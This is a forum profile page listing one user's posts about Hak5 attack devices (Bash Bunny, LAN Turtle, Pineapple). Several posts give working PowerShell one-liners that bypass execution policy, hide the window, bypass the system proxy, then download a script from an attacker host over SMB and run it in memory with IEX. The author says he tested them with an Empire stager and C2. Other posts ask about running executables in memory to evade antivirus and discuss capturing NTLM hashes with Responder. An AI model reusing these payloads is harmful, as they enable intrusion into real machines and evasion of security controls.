Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

Recent Profile Visitors

690 profile views

cyb3rwr3ck's Achievements


Newbie (1/14)

  1. And this is it (works, according to a quick test): powershell -exec Bypass -noP "while ($true) {If ((New-Object net.sockets.tcpclient('<HOST_IN_HERE>','445')).Connected) {$p = [System.Net.WebProxy]::GetDefaultProxy(); $p.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; [System.Net.GlobalProxySelection]::Select = [System.Net.GlobalProxySelection]::GetEmptyWebProxy(); $w=(New-Object System.Net.WebClient).DownloadString('\\<BB_IN_HERE>\p.txt'); [System.Net.GlobalProxySelection]::Select = $p; IEX $w;exit}}" Store default proxy + Creds to $p Clear proxy Retrieve script from BB to $w Select proxy settings from $p Run script with selected proxy settings
  2. Alright, had some time to check this out during the weekend. Invoke-Webrequest: The -NoProxy option seems to be part of PS >= v. 6, so its not reliably to be found on the victim in any way. This is how it should look like if we want to first check a SMB share for connectivity and then download/execute a payload from it without using the system wide proxy in case of PS >= v6: powershell -exec Bypass -noP -WindowsStyle Hidden "while ($true) {If ((New-Object net.sockets.tcpclient('<HOST_IN_HERE>','445')).Connected) {IEX (Invoke-Webrequest -UseBasicParsing -Uri '\\<HOST_IN_HERE>\p.txt' -NoProxy);exit}}" Right now only this one is working reliable (PS < v6, proxy-settings are applied): powershell -exec Bypass -noP -WindowsStyle Hidden "while ($true) {If ((New-Object net.sockets.tcpclient('<HOST_IN_HERE>','445')).Connected) {IEX (Invoke-Webrequest -UseBasicParsing -Uri '\\<HOST_IN_HERE>\p.txt');exit}}" The most portable, working solution to circumvent the proxy would be the following one. Of course its way to long to fit into a WIN+R call, so it must be QUACKED to cmd or called from disk. powershell -exec Bypass -noP -WindowStyle Hidden "while ($true) {If ((New-Object net.sockets.tcpclient('<HOST_IN_HERE>','445')).Connected) {[System.Net.GlobalProxySelection]::Select = [System.Net.GlobalProxySelection]::GetEmptyWebProxy(); IEX (New-Object System.Net.WebClient).DownloadString('\\<HOST_IN_HERE>\p.txt');exit}}" I have tested this stuff using an Empire stager. One open point is that the stager is also called without proxy settings which will obviously break the attack in a restrictive environment where we want to retrieve the payload from the BB and reach out to the Internet to our C2 Server using the explicit proxy. To me this is kind of strange because the stager does the proxy resolving stuff on its own. So, the new question is: How to reset the proxy settings to the system settings after retrieving the file from the BB. System.Net.GlobalProxySelection does not offer such a method.
  3. The thing is that the bunny presents a Network to the Host during this kind of "bring your own network attack". So the proxy is utilized as long as there is no "direct" exception for exactly this bunny network configuration. This will create a connect request to the explicit proxy which dies... The only thing that should fix this behavior is enforcing this kind of direct request which - in an enterprise setup - is usually done by pac files. I have no idea how to do it temporarily using powershell so this is the goal to achieve.
  4. Hi there, I was wondering how the powershell based bunny payloads that load powershell-script-files from either the smb or the webservice of the bunny could circumvent the system wide proxy. The problem is that the proxy - obviously - is unable to connect to the bunny-IP and the payload fails. The current versions of the payloads does not seem to take this into account. The expected behaviour should be to ignore the system proxy during the initial request to the bunny and to use it in all other requests which is powershell default. I am currently unaware of a good solution to circumvent a system wide proxy in powershell, especially without local admin. Any ideas? Best regards! F
  5. Anybody who has already tried to convert the .exe to a string and run it in-memory via powershell to get rid of the AV problem?
  6. Sorry for the late reply! Actually what I was looking for was the integration of pluggable transports (https://www.torproject.org/docs/pluggable-transports.html.en#user) which should hide the traffic for all kinds of deep-packets-inspection. Bridges are also good, but as far as I understand your code only uses 'standard' tor connections. The perfect combination would be bridges+PT (https://www.torproject.org/docs/bridges#PluggableTransports) to cicumvent DPI and statically blocked entry-guards. I will try to add the PT support asap. EDIT: I recognized that you also use obfs3. I will give it a try.
  7. I can confirm that ufw - which is part of Linux Mint 18 - also prevents me from running wp6.sh without locking down my connections. A "service ufw stop" before running the script or in "connectsaved" function the fixes the problem. @PaulFinch: Would you mind to add your code to github or to this post? This might help others with the same problem without researching it first...
  8. Hmmm, I am facing the same issue. Factory reset of the turtle, opkg update, then configuration of the quickcreds module using the turtle shell. The log folders I see in the /etc/turtle/Responder/logs folder are linked to /root/loot as it should be, but there is nothing in it. On the wire I can see that the poisoning is woking and windows is using the faked proxy which is asking for NTML authentication. Anyway no hashes are dumped to the turtle. I have tested the setup with a domain joined win 7 pro and a stand alone win 10 home.
  9. Hmm, sure I can build it my own. The question was if anyone is aware of a cable with the correct power plug, usb-a connector on the other side and converter from 12v to 5v to save the time assembling it. Best regards! F
  10. Hey there, I am thinking about getting a nano because of its size and new interface but my old Pineapple Juice 1800 is still in good condition. It offers 12v DC output and a "standard" power plug. Does anyone know if there is a cable/converter to convert the output to 5V and usb-a plug? Thx in advance F
  11. Hey Shad, thanks for the great module it works perfectly for connecting back in using the hidden-service! Wouldn't it be cool to have pluggable transports included to hide the TOR traffic from DPI ans so forth? I am unfortunatly not aware if this would be possible with the hidden service... Best regards!
  • Create New...